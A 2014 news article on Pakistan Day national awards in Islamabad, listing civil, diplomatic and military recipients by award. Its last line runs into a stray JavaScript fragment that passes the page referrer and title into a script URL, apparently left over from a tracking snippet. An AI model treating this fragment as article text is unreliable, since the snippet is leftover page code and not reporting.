Published On: Mon, Mar 24th, 2014
Published in Category: Islamabad

President confers National Awards on Pakistan Day

Share This

ISLAMABAD: The President gave away Pakistan National Awards at an investiture ceremony held in Islamabad on the auspicious occasion of Pakistan Day on Sunday.

It was by members of the Federal Cabinet, parliamentarians, services chiefs, diplomats, notables and high civil and military officials.

Ghulam Nabi was given Nishan-i-Imtiaz for his meritorious services in the field of Physics.

Hilal-i-Pakistan was given to former Turkish Ambassador in Pakistan Mustafa Babur Hizlan and Argentinean Ambassador and head of diplomatic corps in Islamabad Rodolfo Jose Martin-Saravia for their services to Pakistan.

Hilal-i-Shuja’at was given to Fayyaz Sumbal Shaheed for the gallantry.

Recipients of Hilal-i-Imtiaz, among others, included Muhammad Naeem for nuclear fuel technology, Nabeel Hayat Malik for mechanical engineering, Major General Muhammad Tahir for cryptography, Zafar Iqbal and Ata-ul-Haq Qasmi for literature, Irfan Siddiqui for journalism and late Syed Iqbal Haider for public service.

Former Sri Lankan High Commissioner retired General C. S. Weerasooriya was given away Sitara-i-Pakistan for his services to Pakistan.

Those who received Sitara-i-Shuja’at included Samina Noreen Shaheed, Abdul Mansoor Kakar Shaheed, Hilal Haider Shaheed and Shaheed Aitzaz Hassan Bangash.

Sitara-i-Imtiaz was given to late M.A. Siddiqui for education, Samiullah Khan, A. Hanif Khan and Hassan Sardar for their services in sports.

Professor Dr. Mohammad Mujahid was given President’s Award for Pride of Performance for his services in materials engineering, Saud Ahmed in journalism, Muhammad Ayub Khan in direction and production and captain Pakistan Cricket team Misbah-ul-Haq in sports.

Recipients of Tamgha-i-Shuja’at, among others, included Muhammad Bashir Shaheed, Malik Taj Muhammad Khan Shaheed, Fazal Karim Shaheed, Balqiaz Khan Shaheed, Hayat Ullah Khan Shaheed, Naeem Ullah Shaheed, Dr. Shabbir Ahmed Magsi Shaheed, Muhammad Anwar Shaheed, late Zahra Shahid Hussain, Muhammad Rafique and Mohabbat Ali Unar.

Wang Dejie was given away Tamgha-i-Imtiaz for his services to Pakistan, Abdul Sattar Muslim for literature and Nijat Bibi for arts.

Park Kyo Soon was given Tamgha-i-Khidmat for her services in Art and Culture.

Recipients of Hilal-i-Imtiaz (military), among others, included Vice Admiral Ghazanfar Hussain, Air Marshal Sohail Aman, Rear Admiral Shahid Saeed, Air Vice Marshal Arshad Qudoos, Rear Admiral Zafar Mehmood Qazi, Air Vice Marshal Syed Razi, Rear Admiral Arifullah Husaini, Major General Akhtar Waheed, Major General Junaid, Major General Salman Ali, Rear Admiral Adnan Nazir, Major General Shahab Naqvi, Major General Shehzad Sikandar, Major General Muhammad Hilal Hussain, Major General Tariq Javed, Major General Ghayyur Mehmood, Major General Asghar Nawaz, Major General Nadir Zaib, Air Vice Marshal Ejaz Mehmood Malik, Major General Nazir Ahmed But, Major General Jamil Rehmat, Major General Ejaz Shahid, Major General Amir Azim Bajwa, Major General Tariq Ghafoor, Major General Aftikhar Wayen, Major General Salim Raza, Major General Abid Nazir, Major General Naveed Mukhtar, Major General Hidayat-ur-Rehman, Major General Arif Warraich, Major General Malik Zafar Iqbal, Major General Mazhar Salim Khan, Major General Maqsood Ahmed Abbasi, Major General Javed Mehmood Bukhari, Major General Anwaar Haider and Major General Waqar Ahmed Khan.

Recipients of Sitara-i-Basalat, among others, included Lieutenant Colonel Khurram Waheed, Major Ibran Ahmed Shaheed, Squadron Leader Bilal Hassan Babri Shaheed, Captain Fasih Babar Amin Shaheed, Captain Salman Sarwar Shaheed, Captain Manan-ul-Hasan Shaheed, Captain Hafeezullah, Captain Tariq Jamal Shaheed, Commander Mohsin Farooq, Lieutinent Anas Satti, Naib Subedar Murad Khan Shaheed, Naib Sobedar Safi Ullah, Hawaldar Amraiz Shaheed, Lance Hawaldar Mazhar Iqbal Shaheed, Sepoy Jahangir Shaheed, Deputy Superintendent Rangers Hanif Khan Shaheed, Sepoy Imran Hussain Shah Shaheed, Sepoy Zohaib Iqbal Shaeed, Sepoy Ashiq Ali Shaheed , Sepoy Khurram Shahzad Shaheed and Arshan Mehmood.s.src=’’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;